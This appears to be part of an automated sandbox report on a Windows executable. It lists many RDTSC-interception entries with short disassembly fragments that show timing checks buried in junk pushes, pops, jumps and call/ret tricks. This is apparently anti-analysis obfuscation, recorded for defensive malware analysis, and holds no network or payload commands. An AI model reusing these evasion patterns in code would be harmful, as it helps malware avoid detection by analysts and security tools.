Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD1DD8 second address: BD1E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F927881D806h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F927881D80Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F927881D813h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0A691 second address: C0A695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10F87 second address: C10F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C103B2 second address: C103C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F9278BE2828h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C103C7 second address: C103CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C103CD second address: C103E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9278BE2826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jbe 00007F9278BE282Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10C16 second address: C10C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10C21 second address: C10C37 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9278BE2826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007F9278BE2826h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10C37 second address: C10C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F927881D819h 0x0000000a jmp 00007F927881D811h 0x0000000f popad 0x00000010 jnp 00007F927881D818h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10DBE second address: C10DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10DC2 second address: C10DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14150 second address: C1415A instructions: 0x00000000 rdtsc 0x00000002 je 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14487 second address: C14499 instructions: 0x00000000 rdtsc 0x00000002 js 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14499 second address: C1449F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1449F second address: C144A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C144A5 second address: C144A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1453F second address: C14544 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1480F second address: C14827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C148BB second address: C148BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C148BF second address: C148C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C148C5 second address: C148CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C148CB second address: C148CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14DEB second address: C14E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jl 00007F927881D813h 0x0000000c jmp 00007F927881D80Dh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14E56 second address: C14E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9278BE282Dh 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 mov dword ptr [ebp+122D23F6h], ecx 0x00000016 nop 0x00000017 push esi 0x00000018 push ecx 0x00000019 jnc 00007F9278BE2826h 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14E86 second address: C14E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D815h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15048 second address: C1504E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15450 second address: C15460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D80Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15460 second address: C15464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C159CE second address: C159D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C159D4 second address: C159D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C159D8 second address: C159DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C159DC second address: C159FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9278BE2835h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1626F second address: C16276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16C3E second address: C16C4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17EF0 second address: C17EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17EF4 second address: C17EFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17EFA second address: C17F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F927881D80Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C18BA0 second address: C18BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C19561 second address: C19565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C19565 second address: C195E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9278BE2830h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9278BE2828h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F9278BE282Ch 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F9278BE2828h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c jl 00007F9278BE282Ch 0x00000052 add dword ptr [ebp+122D582Eh], ecx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c pushad 0x0000005d popad 0x0000005e pop esi 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C19F0C second address: C19F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AD14 second address: C1AD22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AD22 second address: C1AD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AD26 second address: C1AD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C208DF second address: C208E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C208E4 second address: C208F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C236EF second address: C23701 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F927881D80Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C208F9 second address: C208FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23D97 second address: C23D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C23F61 second address: C23F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C25F78 second address: C25F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C25F7C second address: C25F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C25139 second address: C25179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F927881D819h 0x00000008 jc 00007F927881D806h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F927881D824h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F927881D812h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C26E40 second address: C26E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27D92 second address: C27DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F927881D808h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, dx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F927881D808h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov ebx, dword ptr [ebp+12476A3Eh] 0x00000049 push eax 0x0000004a jng 00007F927881D825h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C26FE3 second address: C26FE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28E2D second address: C28E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F927881D815h 0x0000000f push 00000000h 0x00000011 or di, 4BF1h 0x00000016 push 00000000h 0x00000018 jns 00007F927881D80Ch 0x0000001e add ebx, dword ptr [ebp+122D398Bh] 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 jmp 00007F927881D818h 0x0000002b jc 00007F927881D808h 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jng 00007F927881D806h 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C27F54 second address: C27F5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29EFD second address: C29F02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29F02 second address: C29F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9278BE2828h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E08C second address: C2E091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E091 second address: C2E097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E097 second address: C2E09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E09B second address: C2E130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9278BE282Dh 0x0000000e nop 0x0000000f push edi 0x00000010 push eax 0x00000011 mov edi, dword ptr [ebp+122D2136h] 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D230Eh], ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F9278BE2828h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d and ebx, dword ptr [ebp+122D3B8Bh] 0x00000043 jmp 00007F9278BE282Ah 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a jmp 00007F9278BE282Eh 0x0000004f pushad 0x00000050 push esi 0x00000051 pop esi 0x00000052 jmp 00007F9278BE2838h 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F9278BE2826h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E130 second address: C2E147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2B207 second address: C2B20C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2C3B2 second address: C2C3BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2C3BC second address: C2C3C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A14A second address: C2A14F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F187 second address: C2F191 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F191 second address: C2F197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F197 second address: C2F19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2D1DC second address: C2D296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D3843h] 0x0000000f jmp 00007F927881D80Eh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F927881D808h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov dword ptr [ebp+12464547h], esi 0x00000044 mov dword ptr [ebp+12464547h], ecx 0x0000004a mov eax, dword ptr [ebp+122D13CDh] 0x00000050 call 00007F927881D813h 0x00000055 mov ebx, edi 0x00000057 pop edi 0x00000058 sub dword ptr [ebp+122D2B58h], ebx 0x0000005e push FFFFFFFFh 0x00000060 call 00007F927881D812h 0x00000065 xor dword ptr [ebp+122D2408h], edi 0x0000006b pop ebx 0x0000006c nop 0x0000006d jne 00007F927881D80Eh 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F927881D816h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2D296 second address: C2D29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3287E second address: C32882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32882 second address: C328AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F9278BE2838h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C328AB second address: C328B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34B6F second address: C34B82 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b ja 00007F9278BE2826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C302C7 second address: C302CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C329BC second address: C329C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C329C0 second address: C32AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D818h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F927881D808h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 and ebx, dword ptr [ebp+122D18E4h] 0x0000002d pushad 0x0000002e push eax 0x0000002f mov dword ptr [ebp+122D2967h], edi 0x00000035 pop ecx 0x00000036 popad 0x00000037 jmp 00007F927881D815h 0x0000003c push dword ptr fs:[00000000h] 0x00000043 mov dword ptr [ebp+122D2057h], ebx 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 ja 00007F927881D81Dh 0x00000056 mov eax, dword ptr [ebp+122D0335h] 0x0000005c call 00007F927881D811h 0x00000061 mov dword ptr [ebp+122D2337h], edx 0x00000067 pop ebx 0x00000068 push FFFFFFFFh 0x0000006a mov bl, 87h 0x0000006c jmp 00007F927881D80Ch 0x00000071 nop 0x00000072 jmp 00007F927881D80Fh 0x00000077 push eax 0x00000078 js 00007F927881D814h 0x0000007e push eax 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32AA3 second address: C32AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BDB6 second address: C3BDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BDBA second address: C3BDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BDBE second address: C3BDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BDC8 second address: C3BDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B569 second address: C3B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41A17 second address: C41A1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41ABB second address: C41AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41AC1 second address: C41AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
